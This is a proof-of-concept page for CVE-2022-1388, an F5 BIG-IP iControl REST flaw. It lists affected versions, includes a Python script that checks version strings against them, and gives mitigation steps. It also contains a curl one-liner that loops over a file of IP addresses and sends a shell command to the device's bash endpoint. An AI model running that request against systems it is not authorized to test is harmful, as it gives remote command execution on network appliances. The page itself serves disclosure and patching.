Source: https://sploitus.com/exploit?id=C807D3D7-EF10-5C00-8252-C9F4B2A7F1F3
# BIG-IP iControl REST vulnerability CVE-2022-1388 PoC

![f5logo](f5.jpeg)

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.

## PoC

You can use the following curl one-liner to check for the F5 BIG-IP vulnerability, or use the provided Python script.

```bash
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
```

## Vulnerable Versions (Big-IP)

| Branch | Vulnerable Versions | Fixes Introduced |
| ---- | ----| ---- |
|11.x|11.6.1-11.6.5|No Fix|
|12.x|12.1.0-12.1.6|No Fix|
|13.x|13.1.0-13.1.4|13.1.5|
|14.x|14.1.0-14.1.4|14.1.4.6|
|15.x|15.1.0-15.1.5|15.1.5.1|
|16.x|16.1.0-16.1.2|16.1.2.2|
|17.x|None|17.0.0|
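To triage an inventory against the table above, here is an added Python example (not part of the original PoC repository) that classifies a BIG-IP version string using only the ranges in that table; the `AFFECTED` list and `assess` function are mine, and the sample version strings at the bottom are constructed.

```python
# Added example: map a BIG-IP version string onto the affected-version table.
# The ranges are transcribed from the table on this page; anything outside
# them is reported as "not-listed" rather than guessed at.
from typing import Optional, Tuple

# (branch, first vulnerable, last vulnerable, fixed version or None)
AFFECTED = [
    ("11.x", "11.6.1", "11.6.5", None),
    ("12.x", "12.1.0", "12.1.6", None),
    ("13.x", "13.1.0", "13.1.4", "13.1.5"),
    ("14.x", "14.1.0", "14.1.4", "14.1.4.6"),
    ("15.x", "15.1.0", "15.1.5", "15.1.5.1"),
    ("16.x", "16.1.0", "16.1.2", "16.1.2.2"),
]


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '14.1.4.6' into (14, 1, 4, 6) so versions compare numerically."""
    return tuple(int(p) for p in v.strip().split("."))


def assess(version: str) -> Tuple[str, Optional[str]]:
    """Return (status, fixed_version) with status one of
    'vulnerable', 'fixed' or 'not-listed', per the table above."""
    v = parse_version(version)
    for _branch, first, last, fix in AFFECTED:
        lo = parse_version(first)
        if v[:1] != lo[:1]:
            continue  # different major branch
        if fix is not None:
            hi = parse_version(fix)
            if lo <= v < hi:  # e.g. 14.1.4.5 sits below the 14.1.4.6 fix
                return ("vulnerable", fix)
            if v >= hi:
                return ("fixed", fix)
        else:
            hi = parse_version(last)
            # No fix on this branch: any point release of the last listed
            # version (12.1.6.x) is still inside the vulnerable range.
            if lo <= v and v[: len(hi)] <= hi:
                return ("vulnerable", None)
    return ("not-listed", None)


if __name__ == "__main__":
    # Constructed sample version strings for demonstration.
    for sample in ["14.1.4.5", "14.1.4.6", "16.1.2", "12.1.6.3", "17.0.0"]:
        status, fix = assess(sample)
        print(f"{sample}: {status}" + (f" (fixed in {fix})" if fix else ""))
```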

## Mitigation

<ul>
  <li>Upgrade to the fixed version in the <code>Fixes Introduced</code> column (preferred method)</li>
  <li>Block iControl REST access through the self IP address</li>
  <li>Block iControl REST access through the management interface</li>
  <li>Modify the BIG-IP httpd configuration</li>
</ul>

For more information about mitigation, see the references.

## References
<ul>
  <li>https://vulners.com/cve/CVE-2022-1388</li>
  <li>https://support.f5.com/csp/article/K23605346</li>
  <li>https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit</li>
</ul>